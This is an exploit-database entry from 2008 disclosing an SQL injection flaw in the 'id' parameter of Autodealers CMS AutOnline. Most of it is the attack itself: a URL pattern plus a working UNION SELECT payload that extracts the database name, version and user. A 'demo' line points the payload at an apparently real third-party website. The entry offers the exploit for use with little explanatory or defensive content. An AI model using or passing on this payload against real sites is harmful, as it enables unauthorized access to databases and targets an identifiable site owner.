id: 3648
date: 09/10/2008
title: Autodealers CMS AutOnline (id) SQL Injection Vulnerability
author: ZoRLu
cves: 

==========================================================
Autodealers CMS AutOnline (id) SQL Injection Vulnerability
==========================================================



############################################################################################################
[+] Autodealers CMS AutOnline (id) SQL Injection Vulnerability
[+] Discovered By ZoRLu                  
############################################################################################################
[+]
[+]
[+]
[+]

   exploit:
http://localhost/script_path/index.php?page=detail&id=[SQL]

[+]
[+]
[+]
[+]

   [SQL]=
ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+]
[+]
[+]   
[+]

   demo:
http://www.aartsvastgoed.nl/aankoopvastgoed/index.php?page=detail&id=ZoRLu'%20union%20select%20null,concat(database(),0x3a,version(),0x3a,user()),null,concat(database(),0x3a,version(),0x3a,user()),null,null,null,null,null/*

[+]
[+] 
[+]
[+] 
############################################################################################################




#  0day.today [2023-03-23]  #